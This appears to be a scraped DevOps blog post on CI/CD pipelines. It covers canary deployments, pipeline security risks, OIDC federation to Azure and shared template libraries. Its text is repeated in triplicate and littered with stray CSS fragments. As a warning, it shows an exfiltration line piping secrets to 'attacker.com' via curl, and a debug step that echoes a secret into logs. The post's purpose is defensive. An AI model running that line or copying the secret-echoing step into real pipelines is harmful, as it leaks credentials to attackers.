β”‚ Risk β”‚ Speed β”‚ Rollback β”‚ Best For ───────────────────┼───────┼───────┼──────────┼────────────────── Rolling Update β”‚ Med β”‚ Fast β”‚ Slow β”‚ Default K8s strategy Blue-Green β”‚ Low β”‚ Fast β”‚ Instant β”‚ Stateless services Canary β”‚ Low β”‚ Slow β”‚ Fast β”‚ High-risk changes Feature Flags β”‚ Lowestβ”‚ Inst. β”‚ Instant β”‚ Business logic changes Step 1: Deploy new version to 5% of traffic β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 95% traffic β†’ v1.0 (3 pods) β”‚ β”‚ 5% traffic β†’ v2.0 (1 pod) β”‚ ← Watch error rates, latency β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step 2: If metrics look good, increase to 25% β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 75% traffic β†’ v1.0 (3 pods) β”‚ β”‚ 25% traffic β†’ v2.0 (1 pod) β”‚ ← Still watching... β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step 3: If still good, go to 100% β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 100% traffic β†’ v2.0 (3 pods) β”‚ ← πŸŽ‰ Full rollout β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step ABORT: If any stage looks bad β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 100% traffic β†’ v1.0 (3 pods) β”‚ ← 😌 Safely rolled back β”‚ 0% traffic β†’ v2.0 (removed) β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step 1: Deploy new version to 5% of traffic β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 95% traffic β†’ v1.0 (3 pods) β”‚ β”‚ 5% traffic β†’ v2.0 (1 pod) β”‚ ← Watch error rates, latency β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step 2: If metrics look good, increase to 25% β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 75% traffic β†’ v1.0 (3 pods) β”‚ β”‚ 25% traffic β†’ v2.0 (1 pod) β”‚ ← Still watching... β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step 3: If still good, go to 100% β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 100% traffic β†’ v2.0 (3 pods) β”‚ ← πŸŽ‰ Full rollout β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step ABORT: If any stage looks bad β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 100% traffic β†’ v1.0 (3 pods) β”‚ ← 😌 Safely rolled back β”‚ 0% traffic β†’ v2.0 (removed) β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step 1: Deploy new version to 5% of traffic β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 95% traffic β†’ v1.0 (3 pods) β”‚ β”‚ 5% traffic β†’ v2.0 (1 pod) β”‚ ← Watch error rates, latency β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step 2: If metrics look good, increase to 25% β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 75% traffic β†’ v1.0 (3 pods) β”‚ β”‚ 25% traffic β†’ v2.0 (1 pod) β”‚ ← Still watching... β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step 3: If still good, go to 100% β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 100% traffic β†’ v2.0 (3 pods) β”‚ ← πŸŽ‰ Full rollout β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Step ABORT: If any stage looks bad β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ 100% traffic β†’ v1.0 (3 pods) β”‚ ← 😌 Safely rolled back β”‚ 0% traffic β†’ v2.0 (removed) β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #1: Secrets in pipeline logs β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Step: Deploy β”‚ β”‚ $ echo $DATABASE_CONNECTION_STRING β”‚ β”‚ Server=prod.db.windows.net;Password=Pa$$w0rdβ”‚ ← 🫠 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #2: Pull request pipelines run arbitrary code β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ External contributor opens PR β”‚ β”‚ PR changes build script to: β”‚ β”‚ echo $SECRETS | -weight: 500;">curl attacker.com β”‚ β”‚ Pipeline runs automatically... β”‚ ← 😱 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #3: Dependency confusion attacks β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Internal package: @mycompany/utils β”‚ β”‚ Attacker publishes: @mycompany/utils on -weight: 500;">npm β”‚ β”‚ Pipeline installs public one first... β”‚ ← 🦠 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #1: Secrets in pipeline logs β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Step: Deploy β”‚ β”‚ $ echo $DATABASE_CONNECTION_STRING β”‚ β”‚ Server=prod.db.windows.net;Password=Pa$$w0rdβ”‚ ← 🫠 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #2: Pull request pipelines run arbitrary code β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ External contributor opens PR β”‚ β”‚ PR changes build script to: β”‚ β”‚ echo $SECRETS | -weight: 500;">curl attacker.com β”‚ β”‚ Pipeline runs automatically... β”‚ ← 😱 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #3: Dependency confusion attacks β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Internal package: @mycompany/utils β”‚ β”‚ Attacker publishes: @mycompany/utils on -weight: 500;">npm β”‚ β”‚ Pipeline installs public one first... β”‚ ← 🦠 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #1: Secrets in pipeline logs β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Step: Deploy β”‚ β”‚ $ echo $DATABASE_CONNECTION_STRING β”‚ β”‚ Server=prod.db.windows.net;Password=Pa$$w0rdβ”‚ ← 🫠 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #2: Pull request pipelines run arbitrary code β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ External contributor opens PR β”‚ β”‚ PR changes build script to: β”‚ β”‚ echo $SECRETS | -weight: 500;">curl attacker.com β”‚ β”‚ Pipeline runs automatically... β”‚ ← 😱 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Scary Thing #3: Dependency confusion attacks β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ Internal package: @mycompany/utils β”‚ β”‚ Attacker publishes: @mycompany/utils on -weight: 500;">npm β”‚ β”‚ Pipeline installs public one first... β”‚ ← 🦠 β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ Authentication: βœ… OIDC federation (no long-lived secrets in pipelines) βœ… Managed Identity for Azure resources βœ… Short-lived tokens (expire in minutes, not months) Authorization: βœ… Pipeline can only deploy to its own -weight: 500;">service βœ… Production deploys require approved PR + passing checks βœ… Environment protection rules with required reviewers Dependencies: βœ… Lock files committed (package-lock.json, go.sum) βœ… Dependency scanning (Dependabot, Snyk) βœ… Private package registry for internal packages Secrets: βœ… Never echo/print secrets in logs βœ… Use secret masking in pipeline variables βœ… Rotate secrets automatically βœ… Audit who accesses what secret Authentication: βœ… OIDC federation (no long-lived secrets in pipelines) βœ… Managed Identity for Azure resources βœ… Short-lived tokens (expire in minutes, not months) Authorization: βœ… Pipeline can only deploy to its own -weight: 500;">service βœ… Production deploys require approved PR + passing checks βœ… Environment protection rules with required reviewers Dependencies: βœ… Lock files committed (package-lock.json, go.sum) βœ… Dependency scanning (Dependabot, Snyk) βœ… Private package registry for internal packages Secrets: βœ… Never echo/print secrets in logs βœ… Use secret masking in pipeline variables βœ… Rotate secrets automatically βœ… Audit who accesses what secret Authentication: βœ… OIDC federation (no long-lived secrets in pipelines) βœ… Managed Identity for Azure resources βœ… Short-lived tokens (expire in minutes, not months) Authorization: βœ… Pipeline can only deploy to its own -weight: 500;">service βœ… Production deploys require approved PR + passing checks βœ… Environment protection rules with required reviewers Dependencies: βœ… Lock files committed (package-lock.json, go.sum) βœ… Dependency scanning (Dependabot, Snyk) βœ… Private package registry for internal packages Secrets: βœ… Never echo/print secrets in logs βœ… Use secret masking in pipeline variables βœ… Rotate secrets automatically βœ… Audit who accesses what secret - name: Debug connection run: | echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}" - name: Debug connection run: | echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}" - name: Debug connection run: | echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}" # GitHub Actions: OIDC to Azure (no secrets!) permissions: id-token: write contents: read steps: - uses: azure/login@v2 with: client-id: ${{ vars.AZURE_CLIENT_ID }} # Not a secret! tenant-id: ${{ vars.AZURE_TENANT_ID }} subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }} # GitHub Actions: OIDC to Azure (no secrets!) permissions: id-token: write contents: read steps: - uses: azure/login@v2 with: client-id: ${{ vars.AZURE_CLIENT_ID }} # Not a secret! tenant-id: ${{ vars.AZURE_TENANT_ID }} subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }} # GitHub Actions: OIDC to Azure (no secrets!) permissions: id-token: write contents: read steps: - uses: azure/login@v2 with: client-id: ${{ vars.AZURE_CLIENT_ID }} # Not a secret! tenant-id: ${{ vars.AZURE_TENANT_ID }} subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }} Platform Team Provides: App Teams Customize: ════════════════════════ ════════════════════ βœ… Template library βœ… Service name & config βœ… Security scanning βœ… Test commands βœ… Deployment strategies βœ… Environment-specific vars βœ… Secret management pattern βœ… Notification channels βœ… DORA metrics collection βœ… Deployment schedule βœ… Compliance guardrails βœ… Custom test stages Platform Team Provides: App Teams Customize: ════════════════════════ ════════════════════ βœ… Template library βœ… Service name & config βœ… Security scanning βœ… Test commands βœ… Deployment strategies βœ… Environment-specific vars βœ… Secret management pattern βœ… Notification channels βœ… DORA metrics collection βœ… Deployment schedule βœ… Compliance guardrails βœ… Custom test stages Platform Team Provides: App Teams Customize: ════════════════════════ ════════════════════ βœ… Template library βœ… Service name & config βœ… Security scanning βœ… Test commands βœ… Deployment strategies βœ… Environment-specific vars βœ… Secret management pattern βœ… Notification channels βœ… DORA metrics collection βœ… Deployment schedule βœ… Compliance guardrails βœ… Custom test stages Template repo: platform/pipeline-templates β”œβ”€β”€ Maintained by platform team β”œβ”€β”€ Versioned with semantic versioning (v2.5.0) β”œβ”€β”€ Teams consume via -weight: 500;">git tags (immutable reference) β”œβ”€β”€ Breaking changes = major version bump β”œβ”€β”€ Teams can contribute improvements via PR └── Monthly "template office hours" for questions Template repo: platform/pipeline-templates β”œβ”€β”€ Maintained by platform team β”œβ”€β”€ Versioned with semantic versioning (v2.5.0) β”œβ”€β”€ Teams consume via -weight: 500;">git tags (immutable reference) β”œβ”€β”€ Breaking changes = major version bump β”œβ”€β”€ Teams can contribute improvements via PR └── Monthly "template office hours" for questions Template repo: platform/pipeline-templates β”œβ”€β”€ Maintained by platform team β”œβ”€β”€ Versioned with semantic versioning (v2.5.0) β”œβ”€β”€ Teams consume via -weight: 500;">git tags (immutable reference) β”œβ”€β”€ Breaking changes = major version bump β”œβ”€β”€ Teams can contribute improvements via PR └── Monthly "template office hours" for questions - It takes 42 minutes to build and deploy - Nobody knows exactly what it does (the YAML is 800 lines) - Each team has their own custom pipeline because "our needs are different" - Flaky tests fail 20% of the time, and everyone just re-runs the pipeline - There's a manual approval step where someone clicks "Approve" without looking - Someone set it up 3 years ago and that person doesn't work here anymore - Use ephemeral agents (fresh VM/container per build) β€” Azure DevOps Scale Set agents or GitHub Actions hosted runners - If self-hosted, add a cleanup job: - Never deploy on Friday (unless you have canary + automated rollback) - Never deploy during peak hours (find your low-traffic window) - Always have automated rollback based on error rates and latency - Small changes, frequent deploys > big changes, occasional deploys - It can push code to production - It has access to secrets and credentials - It can modify infrastructure - It downloads code from the internet (dependencies) - Remove all echo/print statements that reference secrets - Use OIDC federation so there are no secrets to leak: - Measure DORA metrics β€” you can't improve what you don't measure - Template libraries standardize quality without removing team autonomy - Cache everything to cut build times by 80%+ - Canary deployments are the safest way to ship to production - OIDC federation eliminates the #1 pipeline security risk (leaked secrets) - Never deploy on Friday. Just don't. πŸ™… - Time your pipeline end-to-end. Write down the duration of each step. Find the biggest bottleneck. - Check if your pipeline uses long-lived secrets. Replace one with OIDC federation. - Add caching for dependencies if you haven't already β€” measure the before/after build time.